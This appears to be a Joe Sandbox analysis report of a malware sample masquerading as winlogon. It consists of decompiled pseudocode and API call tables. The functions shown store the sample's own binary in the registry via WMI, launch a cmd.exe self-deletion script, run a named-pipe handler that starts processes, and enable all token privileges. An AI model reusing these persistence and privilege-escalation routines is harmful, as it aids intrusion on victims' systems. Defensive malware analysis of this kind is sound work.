												 *((intOrPtr*)( *_t200 + 0x14))(_t200, L"hDefKey", 0,  &_v252, 0);
												_v272 = 8;
												_t203 =  *_t253(L"Environment");
												_v268 = _t203;
												_t204 = _v316;
												 *((intOrPtr*)( *_t204 + 0x14))(_t204, L"sSubKeyName", 0,  &_v276, 0);
												_v296 = 8;
												_t207 =  *_t253(L"Data");
												_v292 = _t207;
												_t208 = _v340;
												 *((intOrPtr*)( *_t208 + 0x14))(_t208, L"sValueName", 0,  &_v300, 0);
												GetModuleFileNameW(0,  &_a768, 0x208);
												_t213 = CreateFileW( &_a768, 0x80000000, 1, 0, 3, 0x80, 0);
												_v344 = _t213;
												if(_t213 == 0xffffffff) {
													_t214 = _v360;
													_t254 = _v364;
													 *((intOrPtr*)( *_t214 + 8))(_t214);
													_t216 = _v336;
													 *((intOrPtr*)( *_t216 + 8))(_t216);
													_t218 = _v336;
													 *((intOrPtr*)( *_t218 + 8))(_t218);
												} else {
													_t220 = GetFileSize(_t213, 0);
													_v348 = _t220;
													_v284 = _t220;
													_t221 =  &_v284;
													_v280 = 0;
													__imp__#15(0x11, 1, _t221);
													_t255 = _t221;
													if(_t255 == 0) {
														L15:
														_t254 = _v376;
														goto L16;
													} else {
														_t229 =  &_v304;
														__imp__#23(_t255, _t229);
														if(_t229 < 0) {
															goto L15;
														} else {
															ReadFile(_v364, _v312, _v368,  &_v296, 0);
															__imp__#24(_t255);
															_v336 = _t255;
															_v344 = 0x2011;
															_t233 = _v384;
															_t234 =  *((intOrPtr*)( *_t233 + 0x14))(_t233, L"uValue", 0,  &_v344, 0);
															_t254 = _v408;
															if(_t234 < 0) {
																L16:
																CloseHandle(_v356);
																_t223 = _v372;
																 *((intOrPtr*)( *_t223 + 8))(_t223);
																_t225 = _v348;
																 *((intOrPtr*)( *_t225 + 8))(_t225);
																_t227 = _v348;
																 *((intOrPtr*)( *_t227 + 8))(_t227);
															} else {
																_t235 = _v400;
																_push( &_v340);
																_v392 = 0;
																_push( &_v392);
																_push(_v404);
																_v340 = 0;
																_push(0);
																_push(0);
																_push(_v396);
																_push(_t254);
																_push(_t235);
																if( *((intOrPtr*)( *_t235 + 0x60))() < 0) {
																	goto L16;
																} else {
																	_t237 = _v372;
																	 *((intOrPtr*)( *_t237 + 0x18))(_t237, 0xffffffff,  &_v440);
																	_t239 = _v436;
																	 *((intOrPtr*)( *_t239 + 8))(_t239);
																	E00D644B0(_v448);
																	CloseHandle(_v436);
																	_t243 = _v452;
																	 *((intOrPtr*)( *_t243 + 8))(_t243);
																	_t245 = _v428;
																	 *((intOrPtr*)( *_t245 + 8))(_t245);
																	_t247 = _v428;
																	 *((intOrPtr*)( *_t247 + 8))(_t247);
																}
															}
														}
													}
												}
											}
										}
									}
									 *_t304(_v248);
									 *_t304(_t254);
								}
								_t179 = _v176;
								 *((intOrPtr*)( *_t179 + 8))(_t179);
							}
							 *_t304(_v128);
							 *_t304(_v80);
							 *_t304(_v132);
							_t177 = _v124;
							 *((intOrPtr*)( *_t177 + 8))(_t177);
						}
						 *_t304( *((intOrPtr*)(_t311 + 8)));
						 *_t304( *((intOrPtr*)(_t311 + 0x10)));
						 *_t304( *_t311);
						LocalFree(_t311);
					}
					__imp__CoUninitialize();
				}
				return E00D6ABE4(_a5572 ^ _t313);
			}
































































































































    0x00d64c33
    0x00d64c3b
    0x00d64c40
    0x00d64c45
    0x00d64c47
    0x00d64c50
    0x00d64c53
    0x00d64c5a
    0x00d64c5e
    0x00d64c62
    0x00d64c66
    0x00d64c6e
    0x00d64c86
    0x00d64c8e
    0x00d64ca7
    0x00d64cbe
    0x00d64cc8
    0x00d64cce
    0x00d64cd4
    0x00d64ce0
    0x00d64ce3
    0x00d64ce9
    0x00d64cf3
    0x00d64cf5
    0x00d64cfb
    0x00d64cfe
    0x00d64d00
    0x00d64d04
    0x00d64d07
    0x00d64d09
    0x00d64d0c
    0x00d64d11
    0x00d64d13
    0x00d64d16
    0x00d64d19
    0x00d64d1e
    0x00d64d21
    0x00d64d34
    0x00d64d3b
    0x00d64d41
    0x00d64d49
    0x00d64d5d
    0x00d64d63
    0x00d64d6d
    0x00d64d71
    0x00d64d77
    0x00d64d7b
    0x00d64d81
    0x00d64d85
    0x00d64d87
    0x00d64d9d
    0x00d64dac
    0x00d64db0
    0x00d64db3
    0x00d64dbb
    0x00d64dd2
    0x00d64dda
    0x00d64de0
    0x00d64de9
    0x00d64df9
    0x00d64e0c
    0x00d64e17
    0x00d64e1e
    0x00d64e22
    0x00d64e24
    0x00d64e33
    0x00d64e3f
    0x00d64e43
    0x00d64e46
    0x00d64e4e
    0x00d65107
    0x00d64e54
    0x00d64e54
    0x00d64e5c
    0x00d64e5e
    0x00d64e5f
    0x00d64e61
    0x00d64e65
    0x00d64e6f
    0x00d64e75
    0x00d650f7
    0x00d650fb
    0x00d65102
    0x00d64e7b
    0x00d64e7b
    0x00d64e83
    0x00d64e84
    0x00d64e8c
    0x00d64e90
    0x00d64e96
    0x00d650dd
    0x00d650e1
    0x00d650e8
    0x00d650eb
    0x00d650f2
    0x00d64e9c
    0x00d64ea1
    0x00d64eac
    0x00d64eb6
    0x00d64ebf
    0x00d64ece
    0x00d64edb
    0x00d64ee0
    0x00d64ee4
    0x00d64eec
    0x00d64efb
    0x00d64f08
    0x00d64f0d
    0x00d64f11
    0x00d64f19
    0x00d64f28
    0x00d64f3a
    0x00d64f5a
    0x00d64f60
    0x00d64f67
    0x00d650b9
    0x00d650bd
    0x00d650c4
    0x00d650c7
    0x00d650ce
    0x00d650d1
    0x00d650d8
    0x00d64f6d
    0x00d64f70
    0x00d64f76
    0x00d64f7a
    0x00d64f7e
    0x00d64f87
    0x00d64f8f
    0x00d64f95
    0x00d64f99
    0x00d6508b
    0x00d6508b
    0x00000000
    0x00d64f9f
    0x00d64f9f
    0x00d64fa5
    0x00d64fad
    0x00000000
    0x00d64fb3
    0x00d64fc6
    0x00d64fcd
    0x00d64fd8
    0x00d64fde
    0x00d64fe7
    0x00d64ff6
    0x00d64ff9
    0x00d64fff
    0x00d6508f
    0x00d65093
    0x00d65099
    0x00d650a0
    0x00d650a3
    0x00d650aa
    0x00d650ad
    0x00d650b4
    0x00d65005
    0x00d65005
    0x00d6500d
    0x00d65012
    0x00d6501a
    0x00d6501b
    0x00d6501f
    0x00d65029
    0x00d6502b
    0x00d6502d
    0x00d65031
    0x00d65032
    0x00d65038
    0x00000000
    0x00d6503a
    0x00d6503a
    0x00d65048
    0x00d6504b
    0x00d65052
    0x00d65059
    0x00d65062
    0x00d65068
    0x00d6506f
    0x00d65072
    0x00d65079
    0x00d6507c
    0x00d65083
    0x00d65083
    0x00d65038
    0x00d64fff
    0x00d64fad
    0x00d64f99
    0x00d64f67
    0x00d64e96
    0x00d64e75
    0x00d6510f
    0x00d65112
    0x00d65112
    0x00d65114
    0x00d6511b
    0x00d6511b
    0x00d65122
    0x00d65128
    0x00d6512e
    0x00d65130
    0x00d65137
    0x00d65137
    0x00d6513d
    0x00d65142
    0x00d65146
    0x00d65149
    0x00d65149
    0x00d6514f
    0x00d6514f
    0x00d65169

    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 00D64C66
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D64C86
    • CredUIParseUserNameW.CREDUI(?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D64CBE
    • LocalAlloc.KERNEL32(00000040,0000001C,?,?,00000201,?), ref: 00D64CC8
    • SysAllocString.OLEAUT32(?), ref: 00D64CE0
    • SysAllocString.OLEAUT32(?), ref: 00D64CE7
    • SysAllocString.OLEAUT32(?), ref: 00D64CF3
    • SysStringLen.OLEAUT32(00000000), ref: 00D64CFE
    • SysStringLen.OLEAUT32(?), ref: 00D64D13
    • SysStringLen.OLEAUT32(00000000), ref: 00D64D1C
    • CoCreateInstance.OLE32(00D7F4B8,00000000,00000001,00D7F3E8,?), ref: 00D64D3B
    • wsprintfW.USER32 ref: 00D64D5D
    • SysAllocString.OLEAUT32(?), ref: 00D64D71
    • SysAllocString.OLEAUT32(?), ref: 00D64D7B
    • SysAllocString.OLEAUT32(?), ref: 00D64D85
    • CoSetProxyBlanket.OLE32(00000000,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64DD2
    • CoSetProxyBlanket.OLE32(?,000000FF,000000FF,000000FF,00000006,00000003,?,00000000), ref: 00D64E0C
    • SysAllocString.OLEAUT32(SetBinaryValue), ref: 00D64E17
    • SysAllocString.OLEAUT32(StdRegProv), ref: 00D64E22
    • VariantClear.OLEAUT32(?), ref: 00D64EA1
    • SysAllocString.OLEAUT32(Environment), ref: 00D64EE0
    • SysAllocString.OLEAUT32(Data), ref: 00D64F0D
    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?), ref: 00D64F3A
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00D64F5A
    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 00D64F70
    • SafeArrayCreate.OLEAUT32 ref: 00D64F8F
    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D64FA5
    • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D64FC6
    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00D64FCD
      • Part of subcall function 00D644B0: SysAllocString.OLEAUT32(Create), ref: 00D644C6
      • Part of subcall function 00D644B0: SysAllocString.OLEAUT32(Win32_Process), ref: 00D644CF
      • Part of subcall function 00D644B0: SysAllocString.OLEAUT32(cmd.exe /c (echo strPath = Wscript.ScriptFullName & echo.Set FSO = CreateObject^("Scripting.FileSystemObject"^) & echo.FSO.DeleteF), ref: 00D6453A
      • Part of subcall function 00D644B0: SysFreeString.OLEAUT32(?), ref: 00D64597
      • Part of subcall function 00D644B0: SysFreeString.OLEAUT32(00000000), ref: 00D645B5
      • Part of subcall function 00D644B0: SysFreeString.OLEAUT32(?), ref: 00D645BA
    • CloseHandle.KERNEL32(00000000), ref: 00D65062
    • CloseHandle.KERNEL32(?), ref: 00D65093
    • SysFreeString.OLEAUT32(00000000), ref: 00D6510F
    • SysFreeString.OLEAUT32(00000000), ref: 00D65112
    • SysFreeString.OLEAUT32(?), ref: 00D65122
    • SysFreeString.OLEAUT32(?), ref: 00D65128
    • SysFreeString.OLEAUT32(?), ref: 00D6512E
    • SysFreeString.OLEAUT32(?), ref: 00D6513D
    • SysFreeString.OLEAUT32(?), ref: 00D65142
    • SysFreeString.OLEAUT32(?), ref: 00D65146
    • LocalFree.KERNEL32(?,?,?,00000201,?,?,?,?,?,?,?,?,?,?,?,00000151), ref: 00D65149
    • CoUninitialize.OLE32 ref: 00D6514F
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D634B0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 165pipefile

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 147 d634b0-d634c0 148 d6353b-d63543 147->148 149 d634c2-d634c4 147->149 149->148 150 d634c6-d634ca 149->150 150->148 151 d634cc-d634f5 CreateNamedPipeW 150->151 151->148 152 d634f7-d634fa 151->152 152->148 153 d634fc-d63532 CreateEventW 152->153 154 d63544-d63590 ConnectNamedPipe GetLastError call d6d520 call d6aa90 153->154 155 d63534-d63535 CloseHandle 153->155 160 d63592-d635a8 CloseHandle * 2 154->160 161 d635a9-d635ab 154->161 155->148 162 d635f2-d635fd CloseHandle 161->162 163 d635ad-d635b5 161->163 164 d63684-d63694 CloseHandle 162->164 165 d63603-d63614 call d702c9 162->165 166 d635b7-d635bc 163->166 167 d635ed 163->167 165->164 173 d63616-d63642 call d6d520 ReadFile 165->173 166->162 169 d635be-d635ce WaitForSingleObject 166->169 167->162 171 d635e4-d635eb CancelIo 169->171 172 d635d0-d635e2 GetOverlappedResult 169->172 171->162 172->162 173->164 176 d63644-d63649 173->176 176->164 177 d6364b-d63663 call d702c9 176->177 177->164 180 d63665-d6367d call d6d520 call d7dae0 177->180 180->164
    C-Code - Quality: 91%
    			E00D634B0(WCHAR* __ecx, char __edx, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				int _v12;
				long _v16;
				struct _OVERLAPPED _v36;
				intOrPtr _v124;
				char _v144;
				char _v148;
				void* __edi;
				void* _t33;
				void* _t34;
				int _t36;
				void* _t45;
				int _t48;
				long _t49;
				long _t50;
				long _t55;
				int _t56;
				char _t65;
				intOrPtr _t66;
				int _t70;
				void* _t71;
				void* _t72;

				_t65 = __edx;
				if(__ecx == 0 || __edx == 0 || _a8 == 0) {
					L7:
					return 0;
				} else {
					_v12 = 0;
					_t33 = CreateNamedPipeW(__ecx, 0x40000001, 0, 1, 0, 0x19000, 0xea60, 0); // executed
					_t72 = _t33;
					if(_t72 == 0 || _t72 == 0xffffffff) {
						goto L7;
					} else {
						_v36.Internal = 0;
						_v36.InternalHigh = 0;
						_v36.Offset = 0;
						_v36.OffsetHigh = 0;
						_v36.hEvent = 0;
						_t34 = CreateEventW(0, 1, 0, 0);
						_v36.hEvent = _t34;
						if(_t34 != 0) {
							_t36 = ConnectNamedPipe(_t72,  &_v36); // executed
							_t70 = _t36;
							_v8 = GetLastError();
							E00D6D520(_t70,  &_v144, 0, 0x6c);
							_t68 =  &_v148;
							_v148 = _t65;
							_v144 = _a4;
							_v124 = 0x44;
							if(E00D6AA90( &_v148) != 0) {
								if(_t70 == 0) {
									_t55 = _v8;
									if(_t55 == 0x217) {
										_t70 = 1;
									} else {
										if(_t55 == 0x3e5) {
											_t56 = WaitForSingleObject(_v36.hEvent, 0xea60);
											if(_t56 != 0) {
												CancelIo(_t72);
											} else {
												_t70 = GetOverlappedResult(_t72,  &_v36,  &_v16, _t56);
											}
										}
									}
								}
								CloseHandle(_v36.hEvent);
								if(_t70 != 0) {
									_push(0x19000); // executed
									_t45 = E00D702C9(_t68); // executed
									_t71 = _t45;
									if(_t71 != 0) {
										E00D6D520(_t71, _t71, 0, 0x19000);
										_v8 = 0;
										_t48 = ReadFile(_t72, _t71, 0x19000,  &_v8, 0); // executed
										if(_t48 != 0) {
											_t49 = _v8;
											if(_t49 != 0) {
												_t50 = _t49 + 2;
												_push(_t50);
												_v16 = _t50;
												_t66 = E00D702C9(_t68);
												 *_a8 = _t66;
												if(_t66 != 0) {
													E00D6D520(_t71, _t66, 0, _v16);
													E00D7DAE0(_t66, _t71, _v8);
													_v12 = 1;
												}
											}
										}
									}
								}
								CloseHandle(_t72);
								return _v12;
							} else {
								CloseHandle(_t72);
								CloseHandle(_v36.hEvent);
								return 0;
							}
						} else {
							CloseHandle(_t72);
							goto L7;
						}
					}
				}
			}

























    0x00d634ba
    0x00d634c0
    0x00d6353b
    0x00d63543
    0x00d634cc
    0x00d634e4
    0x00d634eb
    0x00d634f1
    0x00d634f5
    0x00000000
    0x00d634fc
    0x00d63504
    0x00d6350b
    0x00d63512
    0x00d63519
    0x00d63520
    0x00d63527
    0x00d6352d
    0x00d63532
    0x00d63549
    0x00d6354f
    0x00d63559
    0x00d63565
    0x00d6356d
    0x00d63576
    0x00d6357c
    0x00d63582
    0x00d63590
    0x00d635ab
    0x00d635ad
    0x00d635b5
    0x00d635ed
    0x00d635b7
    0x00d635bc
    0x00d635c6
    0x00d635ce
    0x00d635e5
    0x00d635d0
    0x00d635e0
    0x00d635e0
    0x00d635ce
    0x00d635bc
    0x00d635b5
    0x00d635f5
    0x00d635fd
    0x00d63603
    0x00d63608
    0x00d6360d
    0x00d63614
    0x00d6361e
    0x00d63626
    0x00d6363a
    0x00d63642
    0x00d63644
    0x00d63649
    0x00d6364b
    0x00d6364e
    0x00d6364f
    0x00d63657
    0x00d6365f
    0x00d63663
    0x00d6366b
    0x00d63675
    0x00d6367d
    0x00d6367d
    0x00d63663
    0x00d63649
    0x00d63642
    0x00d63614
    0x00d63685
    0x00d63694
    0x00d63592
    0x00d63599
    0x00d6359e
    0x00d635a8
    0x00d635a8
    0x00d63534
    0x00d63535
    0x00000000
    0x00d63535
    0x00d63532
    0x00d634f5

    APIs
    • CreateNamedPipeW.KERNELBASE(?,40000001,00000000,00000001,00000000,00019000,0000EA60,00000000,00000000,773F423D,?), ref: 00D634EB
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D63527
    • CloseHandle.KERNEL32(00000000), ref: 00D63535
    • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 00D63549
    • GetLastError.KERNEL32 ref: 00D63551
      • Part of subcall function 00D6AA90: CreateProcessW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D6AAB8
      • Part of subcall function 00D6AA90: GetLastError.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,00D6358E), ref: 00D6AAC4
    • CloseHandle.KERNEL32(00000000), ref: 00D63599
    • CloseHandle.KERNEL32(00000000), ref: 00D6359E
    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00D635C6
    • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D635DA
    • CancelIo.KERNEL32(00000000), ref: 00D635E5
    • CloseHandle.KERNEL32(00000000), ref: 00D635F5
    • ReadFile.KERNEL32(00000000,00000000,00019000,00000000,00000000), ref: 00D6363A
    • CloseHandle.KERNEL32(00000000), ref: 00D63685
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D62B90, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 301 d62b90-d62bd0 GetCurrentProcess OpenProcessToken 302 d62bd2-d62be6 call d6abe4 301->302 303 d62be7-d62c04 GetTokenInformation 301->303 304 d62c0a-d62c1a call d702c9 303->304 305 d62cfa-d62d01 303->305 304->305 313 d62c20-d62c34 GetTokenInformation 304->313 307 d62d0a-d62d20 call d6abe4 305->307 308 d62d03-d62d04 CloseHandle 305->308 308->307 315 d62c3a-d62c3e 313->315 316 d62cf1-d62cf7 call d7009a 313->316 317 d62cec 315->317 318 d62c44-d62c47 315->318 316->305 317->316 320 d62c50-d62c81 call d6d520 LookupPrivilegeNameW 318->320 324 d62c83-d62c87 320->324 325 d62ce0-d62ce6 320->325 324->325 326 d62c89-d62cda AdjustTokenPrivileges 324->326 325->317 325->320 326->325
    C-Code - Quality: 69%
    			E00D62B90(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				short _v540;
				int _v544;
				struct _TOKEN_PRIVILEGES _v556;
				long _v564;
				long _v568;
				long _v572;
				void* _v576;
				void* _v580;
				signed int _t28;
				int _t34;
				int _t40;
				int _t46;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t65;
				struct _LUID* _t70;
				signed int _t72;
				signed int _t74;

				_t74 = (_t72 & 0xfffffff8) - 0x23c;
				_t28 =  *0xd88004; // 0x276b9783
				_v8 = _t28 ^ _t74;
				_v572 = 0xffffffff;
				if(OpenProcessToken(GetCurrentProcess(), 0xf01ff,  &_v572) != 0) {
					_v568 = 0;
					_t34 = GetTokenInformation(_v572, 3, 0, 0,  &_v568); // executed
					if(_t34 == 0) {
						_push(_v572);
						_t54 = E00D702C9(_t56);
						_t74 = _t74 + 4;
						if(_t54 != 0) {
							_t40 = GetTokenInformation(_v576, 3, _t54, _v572,  &_v572); // executed
							if(_t40 != 0) {
								_t65 = 0;
								if( *_t54 > 0) {
									_t12 = _t54 + 4; // 0x4
									_t70 = _t12;
									asm("o16 nop [eax+eax]");
									do {
										E00D6D520(_t65,  &_v540, 0, 0x208);
										_t74 = _t74 + 0xc;
										_v572 = 0x104;
										_t46 = LookupPrivilegeNameW(0, _t70,  &_v540,  &_v572); // executed
										if(_t46 != 0 &&  *((intOrPtr*)(_t70 + 8)) == 0) {
											asm("xorps xmm0, xmm0");
											_v568 = _t70->LowPart;
											asm("movq [esp+0x28], xmm0");
											_v564 = _t70->HighPart;
											asm("movq [esp+0x3c], xmm0");
											asm("movq xmm0, [esp+0x2c]");
											_v544 = 0;
											_v556.PrivilegeCount = 1;
											asm("movq [esp+0x44], xmm0");
											_v544 = 2;
											AdjustTokenPrivileges(_v580, 0,  &_v556, 0x10, 0, 0); // executed
										}
										_t65 = _t65 + 1;
										_t70 = _t70 + 0xc;
									} while (_t65 <  *_t54);
								}
							}
							E00D7009A(_t54);
							_t74 = _t74 + 4;
						}
					}
					_t57 = _v576;
					if(_t57 != 0xffffffff) {
						CloseHandle(_t57);
					}
					return E00D6ABE4(_v12 ^ _t74);
				} else {
					return E00D6ABE4(_v8 ^ _t74);
				}
			}
























    0x00d62b96
    0x00d62b9c
    0x00d62ba3
    0x00d62bb1
    0x00d62bd0
    0x00d62bfc
    0x00d62c00
    0x00d62c04
    0x00d62c0a
    0x00d62c13
    0x00d62c15
    0x00d62c1a
    0x00d62c30
    0x00d62c34
    0x00d62c3a
    0x00d62c3e
    0x00d62c44
    0x00d62c44
    0x00d62c47
    0x00d62c50
    0x00d62c5c
    0x00d62c61
    0x00d62c64
    0x00d62c79
    0x00d62c81
    0x00d62c8b
    0x00d62c90
    0x00d62c99
    0x00d62c9f
    0x00d62caa
    0x00d62cb0
    0x00d62cbc
    0x00d62cc4
    0x00d62ccc
    0x00d62cd2
    0x00d62cda
    0x00d62cda
    0x00d62ce0
    0x00d62ce1
    0x00d62ce4
    0x00d62c50
    0x00d62cec
    0x00d62cf2
    0x00d62cf7
    0x00d62cf7
    0x00d62c1a
    0x00d62cfa
    0x00d62d01
    0x00d62d04
    0x00d62d04
    0x00d62d20
    0x00d62bd2
    0x00d62be6
    0x00d62be6

    APIs
    • GetCurrentProcess.KERNEL32(000F01FF,?), ref: 00D62BC1
    • OpenProcessToken.ADVAPI32(00000000), ref: 00D62BC8
    • GetTokenInformation.KERNELBASE(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62C00
    • GetTokenInformation.KERNELBASE(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 00D62C30
    • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 00D62C79
    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,00000010,00000000,00000000), ref: 00D62CDA
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00D62D04
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D643A0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57library

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 584 d643a0-d643b8 585 d643ba-d643ca call d6abe4 584->585 586 d643cb-d643fa call d6d520 GetVersionExW 584->586 586->585 591 d643fc-d64403 586->591 591->585 592 d64405-d64412 LoadLibraryW 591->592 592->585 593 d64414-d64422 GetProcAddress 592->593 593->585 594 d64424-d6443f SHGetKnownFolderPath call d6abe4 593->594 596 d64444-d64447 594->596
    C-Code - Quality: 71%
    			E00D643A0(void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				struct _OSVERSIONINFOW _v284;
				signed int _t10;
				struct HINSTANCE__* _t18;
				_Unknown_base(*)()* _t19;
				void* _t32;
				signed int _t33;

				_t10 =  *0xd88004; // 0x276b9783
				_v8 = _t10 ^ _t33;
				_t32 = __ecx;
				if(__ecx != 0) {
					E00D6D520(__edi,  &(_v284.dwMajorVersion), 0, 0x110);
					_v284.dwOSVersionInfoSize = 0x114;
					if(GetVersionExW( &_v284) == 0 || _v284.dwMajorVersion < 6) {
						goto L1;
					} else {
						_t18 = LoadLibraryW(L"shell32.dll");
						if(_t18 == 0) {
							goto L1;
						} else {
							_t19 = GetProcAddress(_t18, "SHGetKnownFolderPath");
							if(_t19 == 0) {
								goto L1;
							} else {
								 *_t19(0, 0, _t32); // executed
								return E00D6ABE4(_v8 ^ _t33, 0xd7f2e0);
							}
						}
					}
				} else {
					L1:
					return E00D6ABE4(_v8 ^ _t33);
				}
			}










    0x00d643a9
    0x00d643b0
    0x00d643b4
    0x00d643b8
    0x00d643d9
    0x00d643e1
    0x00d643fa
    0x00000000
    0x00d64405
    0x00d6440a
    0x00d64412
    0x00000000
    0x00d64414
    0x00d6441a
    0x00d64422
    0x00000000
    0x00d64424
    0x00d6442e
    0x00d64447
    0x00d64447
    0x00d64422
    0x00d64412
    0x00d643ba
    0x00d643ba
    0x00d643ca
    0x00d643ca

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetVersionExW.KERNEL32(00000114), ref: 00D643F2
    • LoadLibraryW.KERNEL32(shell32.dll), ref: 00D6440A
    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00D6441A
    • SHGetKnownFolderPath.SHELL32(00D7F2E0,00000000,00000000,?), ref: 00D6442E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D65970, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164
    C-Code - Quality: 91%
    			E00D65970(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v264;
				char _v1288;
				void* _v1560;
				struct _OSVERSIONINFOW _v1564;
				void* _v1568;
				char _v1572;
				signed int _t40;
				void* _t46;
				signed int _t58;
				signed int _t60;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				char _t76;
				void* _t78;
				void* _t79;
				void* _t83;
				intOrPtr* _t87;
				void* _t88;
				signed int _t90;
				int _t93;
				intOrPtr* _t95;
				signed int _t100;
				int _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				signed int _t110;
				void* _t111;
				void* _t112;
				signed int _t113;
				void* _t114;
				void* _t116;
				signed int _t128;
				void* _t130;
				void* _t132;
				void* _t133;
				signed int _t134;

				_t114 = __edi;
				_t40 =  *0xd88004; // 0x276b9783
				_v8 = _t40 ^ _t134;
				_t130 = 0;
				_t78 = __ecx;
				E00D6D520(__edi,  &_v1564, 0, 0x114);
				_v1564.dwOSVersionInfoSize = 0x114;
				if(GetVersionExW( &_v1564) != 0) {
					asm("sbb esi, esi");
					_t130 = 1;
				}
				_v1568 = 0;
				_t46 = E00D642C0( &_v1568, _t130, _t114); // executed
				if(_t46 != 0) {
					E00D6D520(_t114,  &_v1288, 0, 0x400);
					_t131 = _v1568;
					E00D6EAB8( &_v1288, _v1568, 0x3ff);
					E00D7009A(_v1568);
					_v1572 = 0;
					E00D62D30( &_v1572, _t114, _v1568, __eflags); // executed
					E00D6D520(_t114,  &_v264, 0, 0x100);
					E00D6EAB8( &_v264, _v1572, 0xff);
					E00D7009A(_v1572);
					_t106 =  &_v264;
					_v1568 = 0;
					_t83 = _t106 + 1;
					do {
						_t58 =  *_t106;
						_t106 = _t106 + 1;
						__eflags = _t58;
					} while (_t58 != 0);
					_t60 = E00D65670(_t78,  &_v264, _t106 - _t83, _t114, _t131,  &_v1568);
					__eflags = _t60;
					if(_t60 == 0) {
						goto L3;
					} else {
						_t87 =  &_v1288;
						_t108 = _t87 + 1;
						do {
							_t63 =  *_t87;
							_t87 = _t87 + 1;
							__eflags = _t63;
						} while (_t63 != 0);
